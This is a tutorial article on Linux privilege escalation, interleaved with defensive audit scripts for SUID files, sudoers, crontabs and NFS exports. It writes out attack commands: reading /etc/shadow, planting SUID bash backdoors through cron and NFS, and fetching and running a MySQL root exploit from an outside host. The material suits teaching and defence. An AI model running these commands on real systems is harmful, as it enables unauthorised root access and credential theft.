
An introduction to common Linux privilege escalation methods

2025-03-31 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01

This article introduces common Linux privilege escalation methods. Many people run into these situations when working on real cases, so let's go through how to handle them. I hope you read it carefully and get something out of it!

1. Kernel vulnerability privilege escalation

Any discussion of kernel privilege escalation has to mention the Dirty COW vulnerability, one of the longest-standing and most widespread vulnerabilities. A low-privilege user can exploit it to escalate privileges locally, and it can also be used to escape from a Docker container and obtain a shell with root privileges.

1.1 Local privilege escalation via the kernel

(1) Check the kernel version

    # View the system release
    lsb_release -a
    # View the kernel version
    uname -a

(2) Download, compile and generate the exploit file

    bypass@ubuntu:~$ make

(3) If execution succeeds, a shell with root privileges is returned.

1.2 Using the Dirty COW vulnerability to escape from Docker

(1) Enter the container, compile the PoC and execute it:

(2) The shell connected back from the host is successfully received on the attacker's machine.

1.3 Auxiliary tools for Linux privilege escalation

GitHub project address:

https://github.com/mzet-/linux-exploit-suggester.git

(1) Automatically find matching privilege escalation scripts based on the operating system version

    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

(2) Download the PoC according to the prompts, then compile and execute it.

2. SUID privilege escalation

SUID is a special permission that lets the caller temporarily gain the permissions of the file's owner while the file executes. If you can find and run an SUID file owned by root, the file runs with root privileges.

(1) Find the SUID files on the Linux system that can be used for privilege escalation.

    find / -perm -u=s -type f 2>/dev/null

(2) Execute commands with root privileges through find

Commands that can be used for privilege escalation on Linux, and how they are invoked:

    # find
    find pentestlab -exec whoami \;
    # vim
    vim.tiny /etc/shadow
    # awk
    awk 'BEGIN {system("whoami")}'
    # curl
    curl file:///etc/shadow
    # bash
    bash -p
    # less
    less /etc/passwd
    # nmap
    nmap --interactive
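A defender-side check for this section, as an added example that is not part of the original article: it compares the current SUID inventory with a known-good baseline and tags every new entry. The tag names, the one-path-per-line file layout and the sample paths are assumptions made for the example; the list of risky names is the one given above.

```shell
#!/bin/sh
# Added example: triage SUID files that are new relative to a baseline.
# RISKY_NAMES are the binaries this article lists as abusable when SUID.
RISKY_NAMES="find vim vim.tiny awk curl bash less nmap"

# classify_suid PATH -> RISKY-NAME, WRITABLE-DIR or REVIEW
classify_suid() {
    base=${1##*/}
    for n in $RISKY_NAMES; do
        if [ "$base" = "$n" ]; then echo "RISKY-NAME"; return 0; fi
    done
    case $1 in
        /tmp/*|/var/tmp/*|/dev/shm/*) echo "WRITABLE-DIR" ;;
        *) echo "REVIEW" ;;
    esac
}

# new_suid BASELINE CURRENT -> "TAG<TAB>path" for each path only in CURRENT.
# Both files hold one path per line, as printed by the find command above.
new_suid() {
    awk 'FILENAME == ARGV[1] { seen[$0] = 1; next }
         !($0 in seen)' "$1" "$2" |
    while IFS= read -r p; do
        printf '%s\t%s\n' "$(classify_suid "$p")" "$p"
    done
}

# Constructed sample listings (not taken from a real host).
demo_report() {
    d=$(mktemp -d)
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/mount > "$d/base"
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/mount \
        /usr/bin/find /tmp/shell /opt/backup/agent > "$d/now"
    new_suid "$d/base" "$d/now"
    rm -rf "$d"
}

demo_report
```

An SUID file under a world-writable directory is tagged separately because a copied shell with the bit set does not keep a recognisable name.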

3. sudo privilege escalation

When an ordinary user runs a command with sudo, the command executes as root. In many scenarios, administrators misconfigure the sudoers file for operational convenience, which makes privilege escalation possible.

(1) Set up passwordless sudo

    $ vi /etc/sudoers

Add on the last line:

    bypass ALL=(ALL:ALL) NOPASSWD:ALL

(2) View the sudo permissions
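To audit for the misconfiguration shown in step (1), the following added example (not from the original article) lists every sudoers principal that can run ALL commands without a password. It is a simplified parser that assumes one rule per line and does not expand aliases or include files; the sample rules other than the `bypass` line are constructed.

```shell
#!/bin/sh
# Added example: list sudoers principals that may run ALL commands with
# NOPASSWD. Simplified parser: no line continuations, no alias expansion.
audit_sudoers() {
    awk '
    /^[ \t]*(#|$)/ { next }                  # comments, #include, blanks
    $1 ~ /^Defaults/ || $1 ~ /_Alias$/ { next }
    {
        eq = index($0, "=")
        if (eq == 0) next
        spec = substr($0, eq + 1)
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "", spec)   # drop the (runas) part
        n = split(spec, cmds, ",")
        nopw = 0                             # tag state carries across commands
        for (i = 1; i <= n; i++) {
            c = cmds[i]
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            while (match(c, /^[A-Z_]+:[ \t]*/)) {
                tag = substr(c, 1, RLENGTH)
                if (tag ~ /^NOPASSWD:/) nopw = 1
                if (tag ~ /^PASSWD:/) nopw = 0
                c = substr(c, RLENGTH + 1)
            }
            if (nopw && c == "ALL") { print $1; break }
        }
    }'
}

# Constructed sample; only the "bypass" rule comes from this article.
sample_sudoers() {
    cat <<'EOF'
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
bypass  ALL=(ALL:ALL) NOPASSWD:ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup  ALL=(ALL) NOPASSWD: /usr/bin/rsync, ALL
ops     ALL=(ALL) NOPASSWD: /usr/bin/rsync, PASSWD: ALL
EOF
}

sample_sudoers | audit_sudoers
```

The `backup` rule is flagged because a NOPASSWD tag stays in effect for later commands in the same list until a PASSWD tag resets it.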

4. Scheduled tasks

If you can find a scheduled task script that you have permission to modify, you can modify the script to escalate privileges. In essence, this is a file permission misconfiguration.

(1) Check the scheduled tasks and find a scheduled task script that you have permission to modify.

    ls -l /etc/cron*
    more /etc/crontab

(2) Add a SUID shell backdoor to mysqlback.sh, so that root privileges can be obtained the next time the scheduled task runs as root.

    cp /bin/bash /tmp/shell
    chmod u+s /tmp/shell
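Since the root cause here is file permissions, the following added example (not from the original article) audits a system crontab for scripts that root runs and that are group- or world-writable. It assumes the system crontab format with a user field, checks mode bits only, and builds a constructed fixture in a temporary directory.

```shell
#!/bin/sh
# Added example: find scripts that root cron jobs run and that other
# accounts can modify (group- or world-writable mode bits).

# cron_root_commands CRONTAB -> first word of each root job (system crontab
# format: five time fields or @keyword, then user, then command).
cron_root_commands() {
    awk '/^[ \t]*(#|$)/ { next }
         $1 ~ /^[A-Za-z_]+=/ { next }
         $1 ~ /^@/ { if ($2 == "root") print $3; next }
         NF >= 7 && $6 == "root" { print $7 }' "$1"
}

# is_loosely_writable FILE -> status 0 if group- or world-writable.
is_loosely_writable() {
    [ -e "$1" ] || return 1
    perms=$(ls -ldL "$1" | awk '{ print $1 }')
    case $perms in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_cron CRONTAB -> absolute script paths that fail the check.
audit_cron() {
    cron_root_commands "$1" | while IFS= read -r cmd; do
        case $cmd in /*) ;; *) continue ;; esac
        if is_loosely_writable "$cmd"; then printf '%s\n' "$cmd"; fi
    done
}

# Constructed fixture in a temp dir; mysqlback.sh is the script name
# used in this article, the paths and schedule are made up.
demo_cron() {
    d=$(mktemp -d)
    : > "$d/mysqlback.sh"; chmod 777 "$d/mysqlback.sh"
    : > "$d/rotate.sh";    chmod 755 "$d/rotate.sh"
    printf '%s\n' 'SHELL=/bin/sh' "*/5 * * * * root $d/mysqlback.sh" \
        "0 3 * * * root $d/rotate.sh --all" \
        "30 2 * * * www-data $d/mysqlback.sh" > "$d/crontab"
    audit_cron "$d/crontab" | sed "s|^$d/||"
    rm -rf "$d"
}

demo_cron
```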

5. NFS privilege escalation

When a server has an NFS share with the no_root_squash option enabled, a client that connects as root has root permissions on the shared directory, which can be used to escalate privileges.

(1) View the shared directories on the NFS server

    sudo showmount -e 10.1.1.233

(2) Create a local mount directory and mount the shared directory. Create a SUID shell using the attacker's local root privileges.

    sudo mkdir -p /tmp/data
    sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data
    cp /bin/bash /tmp/data/shell
    chmod u+s /tmp/data/shell

(3) Go back to the server you want to escalate on and, as an ordinary user, run the shell with the -p parameter to obtain root privileges.
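On the server side, the option that makes this possible is visible in /etc/exports. The following added example (not from the original article) reports every export and client that has no_root_squash set, and prints the same file with the option changed to root_squash. The sample file is constructed; only the /home/bypass share comes from this article.

```shell
#!/bin/sh
# Added example: flag /etc/exports entries that disable root squashing,
# and show the same file with the option switched to root_squash.

# audit_exports: exports text on stdin -> "path client" per risky entry.
audit_exports() {
    awk '/^[ \t]*(#|$)/ { next }
    {
        for (i = 2; i <= NF; i++) {
            p = index($i, "(")
            if (p == 0) continue
            client = substr($i, 1, p - 1)
            if (client == "") client = "(any)"
            opts = substr($i, p + 1)
            sub(/\).*/, "", opts)
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++)
                if (o[j] == "no_root_squash") print $1, client
        }
    }'
}

# harden_exports: rewrite no_root_squash to root_squash, keep the rest.
harden_exports() {
    sed 's/\([(,]\)no_root_squash\([,)]\)/\1root_squash\2/g'
}

# Constructed sample; /home/bypass is the share used in this article,
# the other paths and clients are made up.
sample_exports() {
    cat <<'EOF'
/home/bypass  *(rw,sync,no_root_squash)
/srv/public   10.1.1.0/24(ro,root_squash)
/srv/build    10.1.1.50(rw,no_root_squash) 10.1.1.51(rw,sync)
EOF
}

sample_exports | audit_exports
```

After editing /etc/exports, `exportfs -ra` re-exports the shares so the change takes effect.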

6. MySQL privilege escalation

MySQL privilege escalation can be done through UDF, MOF, and writing startup items, but what is interesting is that CVE-2016-6663 and CVE-2016-6664 can be combined to raise www-data permissions to root.

(1) Use CVE-2016-6663 to escalate from www-data to mysql:

    cd /var/www/html/
    gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
    ./mysql-privesc-race test 123456 localhost testdb

(2) Use CVE-2016-6664 to escalate from mysql to root:

    wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
    chmod 777 mysql-chowned.sh
    ./mysql-chowned.sh /var/log/mysql/error.log

This is the end of the introduction to common Linux privilege escalation methods. Thank you for reading.
